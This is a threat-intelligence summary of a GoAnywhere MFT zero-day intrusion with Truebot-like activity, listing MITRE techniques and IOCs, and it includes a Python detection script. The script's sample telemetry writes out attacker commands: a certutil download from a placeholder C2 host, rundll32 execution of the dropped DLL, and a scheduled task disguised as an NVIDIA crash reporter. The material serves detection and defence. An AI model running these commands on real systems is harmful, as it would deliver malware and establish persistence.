Huntress linked a February 2023 GoAnywhere MFT-related intrusion to a zero-day vulnerability and Truebot-like post-exploitation activity, leading to mitigation before a ransomware event could unfold. The effort highlighted how certutil and rundll32 were used together with scheduled tasks for persistence, backed by a C2 domain and specific IOCs. #Truebot #Silence #TA505 #GoAnywhereMFT #NvTmRep #Tomcat
Keypoints
- Two alerts on 02 February 2023 showed certutil downloading a file and follow-on scheduled task creation, pointing to a larger intrusion linked to GoAnywhere MFT.
- The downloaded file appeared as gamft.dll; execution used rundll32.exe and a uniquely named export, suggesting a Truebot-like payload.
- Scheduled tasks named NvTmRep_CrashReport… were used for persistence and masked as legitimate NVIDIA crash-report tasks.
- Attack activity occurred under the GoAnywhereSvcAcct account with a Tomcat-based web server, indicating a server compromise tied to GoAnywhere MFT.
- Open-source analysis connected the activity to a GoAnywhere MFT zero-day vulnerability and a broader Truebot/Silence/TA505 ecosystem; a patch followed on 07 February 2023.
- Artifact analysis identified the dropped binaries (gamft.dll among them, with their hashes) and C2 infrastructure (qweastradoc[.]com), corroborating a Truebot lineage.
- Defensive guidance emphasizes early post-exploitation monitoring and minimizing exposed services to detect and defeat intrusions.
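Detection logic for the post-exploitation chain in the key points above, as an added example (not code from the Huntress post). The event field names, the sample telemetry, the placeholder URL, the task name suffix and the export name are constructed assumptions:

```python
# Added example, not code from the Huntress post: flag constructed process-creation
# events that match the GoAnywhere MFT post-exploitation chain described above.
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "user parent image cmdline")  # assumed schema
SERVICE_USER = "GoAnywhereSvcAcct"   # service account named in the findings

# (ATT&CK id, description, predicate); patterns follow the reported tradecraft
RULES = [
    ("T1105/T1140", "certutil fetching or decoding a file",
     lambda e: e.image.lower().endswith("certutil.exe")
     and re.search(r"-urlcache|-decode", e.cmdline, re.I) is not None),
    ("T1218.011", "rundll32 loading a DLL outside System32",
     lambda e: e.image.lower().endswith("rundll32.exe")
     and re.search(r"\.dll\b", e.cmdline, re.I) is not None
     and re.search(r"\\windows\\system32\\", e.cmdline, re.I) is None),
    ("T1053.005/T1036.004", "scheduled task named like the NVIDIA crash reporter",
     lambda e: e.image.lower().endswith("schtasks.exe")
     and "NvTmRep_CrashReport" in e.cmdline),
]

def evaluate(events):
    """Return (id, description, cmdline) per matching event. Only events run as
    the MFT service account or spawned by the Tomcat server hosting GoAnywhere
    are scored, so routine admin use of certutil elsewhere stays quiet."""
    hits = []
    for e in events:
        if e.user.lower() != SERVICE_USER.lower() and "tomcat" not in e.parent.lower():
            continue
        hits.extend((tid, desc, e.cmdline) for tid, desc, pred in RULES if pred(e))
    return hits

def chain_complete(hits):
    """True when ingress, proxy execution and persistence have all been seen."""
    return {tid for tid, _, _ in hits} >= {r[0] for r in RULES}

SAMPLE = [  # constructed telemetry; the URL is a placeholder, not a real C2
    ProcEvent("GoAnywhereSvcAcct", "tomcat9.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://c2.placeholder.invalid:8080/x C:\Users\Public\gamft.dll"),
    ProcEvent("GoAnywhereSvcAcct", "cmd.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\Public\gamft.dll,UniqueExportName"),
    ProcEvent("GoAnywhereSvcAcct", "cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "NvTmRep_CrashReport_1" /tr C:\Users\Public\gamft.dll /sc minute'),
    ProcEvent("admin", "explorer.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://intranet.invalid/tool.exe"),  # out of scope
]
```

Running `evaluate(SAMPLE)` yields three hits (one per rule) and `chain_complete` reports True; the admin-run certutil event is ignored because it is outside the service-account/Tomcat scope.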
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Adversary gained initial access via exploit of the GoAnywhere MFT service.
- [T1203] Exploitation for Client Execution – Adversary gained code execution capability through exploit of the GoAnywhere MFT service.
- [T1053.005] Scheduled Task/Job: Scheduled Task – Adversary created scheduled tasks for persistence purposes.
- [T1036.004] Masquerading: Masquerade Task or Service – Adversary used file naming conventions to impersonate legitimate-looking processes and files.
- [T1553.002] Subvert Trust Controls: Code Signing – Adversary used a valid code signing certificate for the Truebot payload.
- [T1078.003] Valid Accounts: Local Accounts – Adversary used the account associated with the exploited process for subsequent actions.
- [T1140] Deobfuscate/Decode Files or Information – Adversary used certutil to decode an encoded Truebot payload.
- [T1218.011] System Binary Proxy Execution: Rundll32 – Adversary used Rundll32 to attempt execution of the Truebot payload.
- [T1071.001] Application Layer Protocol: Web Protocols – Truebot payload C2 communications were performed over HTTP.
- [T1105] Ingress Tool Transfer – Adversary attempted to retrieve and build the Truebot payload via certutil.
- [T1571] Non-Standard Port – Adversary used HTTP over a non-standard port for Truebot payload retrieval.
- [T1132.001] Data Encoding: Standard Encoding – Adversary encoded the Truebot payload for standard decoding via certutil.
Indicators of Compromise
- [SHA256] Host indicators – c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c, 0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3, c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d
- [File Name] Host indicators – gamft.dll, larabqFa.exe, Pxaz.dll
- [Domain] Network indicators – qweastradoc[.]com
- [IP] Network indicators – 5.188.206[.]76, 92.118.36[.]213
- [Certificate] Host indicators – Thumbprint 8DCCF6AD21A58226521E36D7E5DBAD133331C181, Serial Number 00-82-D2-24-32-3E-FA-65-06-0B-64-1F-51-FA-DF-EF-02
Read more: https://www.huntress.com/blog/investigating-intriguing-exploits